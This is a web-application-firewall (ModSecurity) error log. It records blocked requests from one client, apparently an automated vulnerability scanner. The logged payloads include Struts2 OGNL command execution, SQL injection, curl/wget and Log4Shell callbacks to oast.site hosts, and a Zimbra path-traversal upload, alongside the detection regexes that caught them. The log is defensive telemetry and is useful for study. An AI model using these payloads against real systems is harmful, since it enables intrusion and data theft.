[Tue Aug 29 11:33:49.408138 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "repository.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASFedwAAAAG"]
[Tue Aug 29 11:33:50.404041 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgnr4i6zyorhqxt.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARjjSoAAAAL"]
[Tue Aug 29 11:33:50.408652 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARQ4C8AAAAB"]
[Tue Aug 29 11:33:51.372435 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAAQKOp8AAAAs"]
[Tue Aug 29 11:33:52.412985 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAASEJRAAAAAE"]
[Tue Aug 29 11:33:52.532781 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "repository.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARQ4DwAAAAB"]
[Tue Aug 29 11:33:53.304693 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgdnrkc4he3pr65.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAAQKOqIAAAAs"]
[Tue Aug 29 11:33:53.384144 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAAR@KKEAAAAF"]
[Tue Aug 29 11:33:53.417346 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgmrn46drjkzpkq.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAASEJRwAAAAE"]
[Tue Aug 29 11:33:54.321271 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARQ4EYAAAAB"]
[Tue Aug 29 11:33:54.424537 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAAPDoLAAAAAP"]
[Tue Aug 29 11:33:55.359018 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "repository.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAR@KKUAAAAF"]
[Tue Aug 29 11:33:55.436547 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARy-2EAAAAb"]
[Tue Aug 29 11:33:57.534194 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3UAAAAb"]
[Tue Aug 29 11:33:57.595012 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlg5b7oxijtm9fwf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-3gAAAAb"]
[Tue Aug 29 11:33:58.139236 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASMgdYAAAAO"]
[Tue Aug 29 11:33:59.135284 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASVoFkAAAAe"]
[Tue Aug 29 11:33:59.378327 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAAST4-IAAAAZ"]
[Tue Aug 29 11:34:00.404960 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASMgd8AAAAO"]
[Tue Aug 29 11:34:01.498839 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAAQKOrwAAAAs"]
[Tue Aug 29 11:34:03.397047 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgmeah98gk9q48m.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASS79MAAAAY"]
[Tue Aug 29 11:34:04.407765 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgben6hxabnfmbd.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASVoG8AAAAe"]
[Tue Aug 29 11:34:06.386517 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASI0AIAAAAG"]
[Tue Aug 29 11:34:07.301501 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAAST4-0AAAAZ"]
[Tue Aug 29 11:34:07.326648 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAQKOsEAAAAs"]
[Tue Aug 29 11:34:08.331808 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity 